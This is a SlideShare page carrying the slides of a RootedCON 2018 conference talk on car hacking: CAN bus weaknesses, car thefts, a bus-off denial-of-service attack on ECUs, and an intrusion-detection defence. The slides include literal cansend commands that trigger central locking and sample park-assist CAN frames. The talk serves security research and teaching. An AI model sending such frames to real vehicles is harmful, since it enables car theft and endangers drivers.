SlideShare ist ein Scribd-Unternehmen logo

Carlos Sahuquillo - Car Hacking: de Angelina Jolie a Charlize Theron [rootedvlc2018]

RootedCON
RootedCON

Durante la charla haré una pequeña introducción a la evolución de las redes intravehiculares para terminar hablando sobre el estado del arte de la Seguridad, cómo los ladrones aprovechan algunas de estas vulnerabilidades para robar coches y algunos de los ataques más comunes que se empiezan a ver en coches conectados. También mostraré un pequeño video/demo que vamos a grabar estos días sobre cómo realizar una denegación de servicio a una centralita (ECU) de un vehículo.

Technologie
1 von 37
Downloaden Sie, um offline zu lesen
1 Car Hacking: De Angelina Jolie a Charlize Theron
2 Los mecánicos de toda la vida
3 Los mecánicos de toda la vida
4 Los mecánicos de toda la vida
5 Mercedes 300: El inicio
6 ¿Qué es una ECU? • An ECU is an embedded system that controls/monitors systems in a car. • Combination of ECUs is known as the cars computer. • The cars “computer” is not one system but a large number of small subsystems connected together by a network.
7 ¿Qué es una ECU? • More than 80 ECUs in a car. • Each ECU (Electronic Control Unit) connected in car represents a separate point of vulnerability to a cyber attack. • If one ECU is compromised, it’s a gateway to every other ECU in the vehicle. • Terabytes of data travel between vehicles, cloud networks, wearables and mobile devices, and, obviously they represent a desirable target for cybercriminals.
8 ¿Qué es una ECU? • The CAN bus is a 30-year old architecture. CAN contains numerous vulnerabilities that are inherent in its design. • Lack of segmentation and Boundary Defense. • Lack of Device Authentication. • Unencrypted Traffic. • Security by obscurity is not security at all
9 Seguridad… por oscuridad
10
11
12 Evolución de las amenazas Early hacks Recent hacks
13 Evolución de las amenazas • Hackers Can steal a Tesla Model S in seconds by cloning its key fob: https://www.wired.com/story/hackers-steal-tesla-model-s-seconds-key-fob/
14 Evolución de las amenazas • A Dutch first: Ingenious BMW theft attempt: https://mrooding.me/a- dutch-first-ingenious-bmw-theft-attempt-5f7f49a96ec8
15 ¿Cómo se accede?
16 Nuestro Laboratorio
17 Nuestro Laboratorio
18 Bus-off attack • Fault tolerance • 5 errors Bit error, Stuff error, CRC error, Form error, ACK error • Counters – TEC: transmit error counter – REC: receive error counter error-active bus-off error-passive TEC > 127 | REC > 127 TEC < 128 & REC < 128 TEC > 255 Reset | 128x11 recessive bits
19 Bus-off attack 0 1 0 1 0 1 0 1 0 0 1 0 1 0 1 0 1 0 0 1 0 1 0 1 0 1 1 0 1 0 1 0 1 0 1 0 0 1 0 1 1 0 1 0 1 0 1 0 1 0 0 1 0 1 0 1 0 1 0
20 Bus-off attack • Attack conditions –Same ID –Same time –Different data 0x107 8 0x08 0xA0 0xFE 0x04 0x80 0x00 0x00 0x04 0x107 8 0x08 0x80 0xFE 0x04 0x80 0x00 0x00 0x04 0 0 0 0 1 0 0 0 1 0 1 0 0 0 0 0 0 0 0 0 0 1 0 0 0 1 0 0 0 1 0 0 0 0 0 0 Error raised TEC1 + 8 Error raised TEC2 + 8 TEC = 128 0 0 0 0 1 0 0 0 1 0 1 0 0 0 0 1 0 0 0 1 0 0 0 1 , , , Error raised TEC1 + 8 TEC2 - 1 TEC1 = 255 Bus-off
21 Bus-off attack
22 Bus-off attack (Bonus track)
23 Central locking cansend can0 184#61A40A0009000200 cansend can0 366#0010001E80030000 cansend can0 184#2F51050118000200 cansend can0 366#0010001E80030000
24 Central locking
25 Park assistant
26 Park assistant • Parking operation ~ 1min – 60.000 can messages – 150 IDs ID Byte 0 Byte 1 Byte 2 Byte 3 Byte 4 Byte 5 Byte 6 Byte 7 130 EB 6A 16 00 06 00 04 80 130 8F 6B 16 00 06 00 04 80 130 9C 6C 16 00 06 00 04 80 130 CB 6D 15 00 06 00 04 80 130 01 6E 13 00 06 00 04 80 130 A2 6F 11 00 06 00 04 80 130 C5 61 0E 00 06 00 04 80
27 Park assistant
28 GPS spoofing
29 El futuro
30 El futuro
31 El futuro
32 Cómo podemos protegernos
33 No parece que vaya a dejar de utilizarse http://eecatalog.com/automotive/2013/03/13/automotive-communication-protocols-preparing-for-the- future/
34 Cómo podemos protegernos • IDPS: Real Time Detection and Neutralization – CANBUS Packet Inspection – Context Analysis – Detects malicious CAN messages using ML algorithms – Zero days detection (based on behavior) – Low delay to manage the HUGE amount of data
35 Agradecimientos • A XXXX: por anular la garantía del coche cuando fuimos la primera vez con una ECU brickeada:
36
37 Muchas gracias Carlos Sahuquillo Pascual Automotive CyberSecurity Consultant @csahuqui on Twitter https://sahuquillo.org Igor Robles Puente Automotive CyberSecurity Research Engineer

Empfohlen

Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
RootedCON
 
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK FrameworkSecure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Leszek Mi?
 
Why are we still vulnerable to Side Channel Attacks?
Why are we still vulnerable to Side Channel Attacks?Why are we still vulnerable to Side Channel Attacks?
Why are we still vulnerable to Side Channel Attacks?
Riscure
 
Lowering the bar: deep learning for side-channel analysis
Lowering the bar: deep learning for side-channel analysisLowering the bar: deep learning for side-channel analysis
Lowering the bar: deep learning for side-channel analysis
Riscure
 
How multi-fault injection breaks the security of smart cards
How multi-fault injection breaks the security of smart cardsHow multi-fault injection breaks the security of smart cards
How multi-fault injection breaks the security of smart cards
Riscure
 
HIS 2017 David Oswald- Your car is not a safe box - breaking automotive keyle...
HIS 2017 David Oswald- Your car is not a safe box - breaking automotive keyle...HIS 2017 David Oswald- Your car is not a safe box - breaking automotive keyle...
HIS 2017 David Oswald- Your car is not a safe box - breaking automotive keyle...
jamieayre
 
lesson2 - Nodemcu course - NodeMCU dev Board
lesson2 - Nodemcu course - NodeMCU dev Board lesson2 - Nodemcu course - NodeMCU dev Board
lesson2 - Nodemcu course - NodeMCU dev Board
Elaf A.Saeed
 
Software Attacks on Hardware Wallets
Software Attacks on Hardware WalletsSoftware Attacks on Hardware Wallets
Software Attacks on Hardware Wallets
Priyanka Aash
 

Empfohlen

Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
RootedCON
 
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK FrameworkSecure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Leszek Mi?
 
Why are we still vulnerable to Side Channel Attacks?
Why are we still vulnerable to Side Channel Attacks?Why are we still vulnerable to Side Channel Attacks?
Why are we still vulnerable to Side Channel Attacks?
Riscure
 
Lowering the bar: deep learning for side-channel analysis
Lowering the bar: deep learning for side-channel analysisLowering the bar: deep learning for side-channel analysis
Lowering the bar: deep learning for side-channel analysis
Riscure
 
How multi-fault injection breaks the security of smart cards
How multi-fault injection breaks the security of smart cardsHow multi-fault injection breaks the security of smart cards
How multi-fault injection breaks the security of smart cards
Riscure
 
HIS 2017 David Oswald- Your car is not a safe box - breaking automotive keyle...
HIS 2017 David Oswald- Your car is not a safe box - breaking automotive keyle...HIS 2017 David Oswald- Your car is not a safe box - breaking automotive keyle...
HIS 2017 David Oswald- Your car is not a safe box - breaking automotive keyle...
jamieayre
 
lesson2 - Nodemcu course - NodeMCU dev Board
lesson2 - Nodemcu course - NodeMCU dev Board lesson2 - Nodemcu course - NodeMCU dev Board
lesson2 - Nodemcu course - NodeMCU dev Board
Elaf A.Saeed
 
Software Attacks on Hardware Wallets
Software Attacks on Hardware WalletsSoftware Attacks on Hardware Wallets
Software Attacks on Hardware Wallets
Priyanka Aash
 
Suns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris Valasek
Suns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris ValasekSuns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris Valasek
Suns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris Valasek
Shakacon
 
The Current State of Automotive Security by Chris Valasek
The Current State of Automotive Security by Chris ValasekThe Current State of Automotive Security by Chris Valasek
The Current State of Automotive Security by Chris Valasek
CODE BLUE
 
Embedded Systems in Automotive
Embedded Systems in Automotive Embedded Systems in Automotive
Embedded Systems in Automotive
محمدعبد الحى
 
E-town Banking system
E-town Banking systemE-town Banking system
E-town Banking system
ViVek Patel
 
Automatic Crack Detecting system for Railway security
Automatic Crack Detecting system for Railway securityAutomatic Crack Detecting system for Railway security
Automatic Crack Detecting system for Railway security
Rahul Barick
 
Offensive Payment Security
Offensive Payment SecurityOffensive Payment Security
Offensive Payment Security
Payment Village
 
自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek
自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek
自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek
CODE BLUE
 
Building Your First WOW!! Symbian Application
Building Your First WOW!! Symbian ApplicationBuilding Your First WOW!! Symbian Application
Building Your First WOW!! Symbian Application
Comarch
 
The Great Train Robbery: Fast and Furious
The Great Train Robbery: Fast and FuriousThe Great Train Robbery: Fast and Furious
The Great Train Robbery: Fast and Furious
Sergey Gordeychik
 
Automotive electronics
Automotive electronicsAutomotive electronics
Automotive electronics
jeet1991
 
[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...
Shivam Patel
 
Final presentation
Final presentationFinal presentation
Final presentation
Viral Shah
 
Gentlemen, Start Your Engines 20120514
Gentlemen, Start Your Engines 20120514Gentlemen, Start Your Engines 20120514
Gentlemen, Start Your Engines 20120514
Mattias Jidhage
 
Computer Science Training,IT Training,CS Training,Computer Training Institute,
Computer Science Training,IT Training,CS Training,Computer Training Institute,Computer Science Training,IT Training,CS Training,Computer Training Institute,
Computer Science Training,IT Training,CS Training,Computer Training Institute,
Technogroovy
 
Efficient Reverse Engineering of Automotive Firmware
Efficient Reverse Engineering of Automotive FirmwareEfficient Reverse Engineering of Automotive Firmware
Efficient Reverse Engineering of Automotive Firmware
Riscure
 
Abusing the Train Communication Network or What could have derailed the North...
Abusing the Train Communication Network or What could have derailed the North...Abusing the Train Communication Network or What could have derailed the North...
Abusing the Train Communication Network or What could have derailed the North...
Moshe Zioni
 
HM2015
HM2015HM2015
HM2015
Soumyadeep Mukherjee
 
Leave ATM Forever Alone
Leave ATM Forever AloneLeave ATM Forever Alone
Leave ATM Forever Alone
Olga Kochetova
 
Electronic toll system
Electronic toll systemElectronic toll system
Electronic toll system
Nishigandha Gawas
 
iot review 1.pptx
iot review 1.pptxiot review 1.pptx
iot review 1.pptx
SnekaJ
 
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
RootedCON
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
RootedCON
 

Weitere ähnliche Inhalte

Ähnlich wie Carlos Sahuquillo - Car Hacking: de Angelina Jolie a Charlize Theron [rootedvlc2018]

The Current State of Automotive Security by Chris Valasek
The Current State of Automotive Security by Chris ValasekThe Current State of Automotive Security by Chris Valasek
The Current State of Automotive Security by Chris Valasek
CODE BLUE
 
自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek
自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek
自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek
CODE BLUE
 
Automotive electronics
Automotive electronicsAutomotive electronics
Automotive electronics
jeet1991
 
[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...
Shivam Patel
 
Final presentation
Final presentationFinal presentation
Final presentation
Viral Shah
 

Ähnlich wie Carlos Sahuquillo - Car Hacking: de Angelina Jolie a Charlize Theron [rootedvlc2018] (20)

Suns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris Valasek
Suns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris ValasekSuns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris Valasek
Suns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris Valasek
 
The Current State of Automotive Security by Chris Valasek
The Current State of Automotive Security by Chris ValasekThe Current State of Automotive Security by Chris Valasek
The Current State of Automotive Security by Chris Valasek
 
Embedded Systems in Automotive
Embedded Systems in Automotive Embedded Systems in Automotive
Embedded Systems in Automotive
 
E-town Banking system
E-town Banking systemE-town Banking system
E-town Banking system
 
Automatic Crack Detecting system for Railway security
Automatic Crack Detecting system for Railway securityAutomatic Crack Detecting system for Railway security
Automatic Crack Detecting system for Railway security
 
Offensive Payment Security
Offensive Payment SecurityOffensive Payment Security
Offensive Payment Security
 
自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek
自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek
自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek
 
Building Your First WOW!! Symbian Application
Building Your First WOW!! Symbian ApplicationBuilding Your First WOW!! Symbian Application
Building Your First WOW!! Symbian Application
 
The Great Train Robbery: Fast and Furious
The Great Train Robbery: Fast and FuriousThe Great Train Robbery: Fast and Furious
The Great Train Robbery: Fast and Furious
 
Automotive electronics
Automotive electronicsAutomotive electronics
Automotive electronics
 
[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...
 
Final presentation
Final presentationFinal presentation
Final presentation
 
Gentlemen, Start Your Engines 20120514
Gentlemen, Start Your Engines 20120514Gentlemen, Start Your Engines 20120514
Gentlemen, Start Your Engines 20120514
 
Computer Science Training,IT Training,CS Training,Computer Training Institute,
Computer Science Training,IT Training,CS Training,Computer Training Institute,Computer Science Training,IT Training,CS Training,Computer Training Institute,
Computer Science Training,IT Training,CS Training,Computer Training Institute,
 
Efficient Reverse Engineering of Automotive Firmware
Efficient Reverse Engineering of Automotive FirmwareEfficient Reverse Engineering of Automotive Firmware
Efficient Reverse Engineering of Automotive Firmware
 
Abusing the Train Communication Network or What could have derailed the North...
Abusing the Train Communication Network or What could have derailed the North...Abusing the Train Communication Network or What could have derailed the North...
Abusing the Train Communication Network or What could have derailed the North...
 
HM2015
HM2015HM2015
HM2015
 
Leave ATM Forever Alone
Leave ATM Forever AloneLeave ATM Forever Alone
Leave ATM Forever Alone
 
Electronic toll system
Electronic toll systemElectronic toll system
Electronic toll system
 
iot review 1.pptx
iot review 1.pptxiot review 1.pptx
iot review 1.pptx
 

Mehr von RootedCON

Mehr von RootedCON (20)

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
 

Kürzlich hochgeladen

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Delhi Call girls
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
Puma Security, LLC
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Malak Abu Hammad
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 

Kürzlich hochgeladen (20)

What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 

Carlos Sahuquillo - Car Hacking: de Angelina Jolie a Charlize Theron [rootedvlc2018]

  • 1. 1 Car Hacking: De Angelina Jolie a Charlize Theron
  • 2. 2 Los mecánicos de toda la vida
  • 3. 3 Los mecánicos de toda la vida
  • 4. 4 Los mecánicos de toda la vida
  • 6. 6 ¿Qué es una ECU? • An ECU is an embedded system that controls/monitors systems in a car. • Combination of ECUs is known as the cars computer. • The cars “computer” is not one system but a large number of small subsystems connected together by a network.
  • 7. 7 ¿Qué es una ECU? • More than 80 ECUs in a car. • Each ECU (Electronic Control Unit) connected in car represents a separate point of vulnerability to a cyber attack. • If one ECU is compromised, it’s a gateway to every other ECU in the vehicle. • Terabytes of data travel between vehicles, cloud networks, wearables and mobile devices, and, obviously they represent a desirable target for cybercriminals.
  • 8. 8 ¿Qué es una ECU? • The CAN bus is a 30-year old architecture. CAN contains numerous vulnerabilities that are inherent in its design. • Lack of segmentation and Boundary Defense. • Lack of Device Authentication. • Unencrypted Traffic. • Security by obscurity is not security at all
  • 10. 10
  • 11. 11
  • 12. 12 Evolución de las amenazas Early hacks Recent hacks
  • 13. 13 Evolución de las amenazas • Hackers Can steal a Tesla Model S in seconds by cloning its key fob: https://www.wired.com/story/hackers-steal-tesla-model-s-seconds-key-fob/
  • 14. 14 Evolución de las amenazas • A Dutch first: Ingenious BMW theft attempt: https://mrooding.me/a- dutch-first-ingenious-bmw-theft-attempt-5f7f49a96ec8
  • 18. 18 Bus-off attack • Fault tolerance • 5 errors Bit error, Stuff error, CRC error, Form error, ACK error • Counters – TEC: transmit error counter – REC: receive error counter error-active bus-off error-passive TEC > 127 | REC > 127 TEC < 128 & REC < 128 TEC > 255 Reset | 128x11 recessive bits
  • 19. 19 Bus-off attack 0 1 0 1 0 1 0 1 0 0 1 0 1 0 1 0 1 0 0 1 0 1 0 1 0 1 1 0 1 0 1 0 1 0 1 0 0 1 0 1 1 0 1 0 1 0 1 0 1 0 0 1 0 1 0 1 0 1 0
